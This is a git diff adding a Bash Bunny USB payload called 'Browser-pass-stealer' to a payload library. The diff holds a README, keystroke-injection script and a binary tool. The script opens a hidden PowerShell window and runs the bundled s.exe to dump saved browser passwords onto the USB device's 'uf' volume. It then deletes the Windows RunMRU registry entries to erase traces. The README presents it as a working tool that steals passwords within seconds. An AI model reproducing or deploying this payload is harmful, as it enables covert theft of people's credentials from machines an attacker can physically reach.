diff --git a/payloads/library/Browser-pass-stealer/README.md b/payloads/library/Browser-pass-stealer/README.md new file mode 100644 index 00000000..a2e1583c --- /dev/null +++ b/payloads/library/Browser-pass-stealer/README.md @@ -0,0 +1,10 @@ +Author Justin Hynes credit: Darren Kitchen and www.nirsoft.net + +This allows you to get passwords from browers within seconds! +This is my very first payload and I have tested it on the new bash bunny and so far it works without a problem +There is few thing you need though in order to have this payload working 1 you need the name your bash bunny uf +so that the passwords get saved to the correct place. +2 You need to put the s.exe(very important that you keep it that name) in the home directory of the bash bunny +The payload must be in switch 1 or switch 2 but the s.exe software must be put in the home directory + +Well that is it. Thanks Darren Kitchen and Shannon Morese for all of the youtube videos. :) very helpful. diff --git a/payloads/library/Browser-pass-stealer/payload.txt b/payloads/library/Browser-pass-stealer/payload.txt new file mode 100644 index 00000000..5a59d2a6 --- /dev/null +++ b/payloads/library/Browser-pass-stealer/payload.txt @@ -0,0 +1,8 @@ +LED R 100 +ATTACKMODE HID STORAGE +QUACK DELAY 1000 +QUACK GUI r +QUACK DELAY 75 +QUACK STRING "powershell -windowstyle hidden "'$D'" =Get-WMIObject Win32_Volume | ? { "'$_.Label'" -eq 'uf' } | select name;cd "'$D.name'";./s /stext p;Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue" +QUACK ENTER +LED G \ No newline at end of file diff --git a/payloads/library/Browser-pass-stealer/s.exe b/payloads/library/Browser-pass-stealer/s.exe new file mode 100644 index 00000000..153fb2f1 Binary files /dev/null and b/payloads/library/Browser-pass-stealer/s.exe differ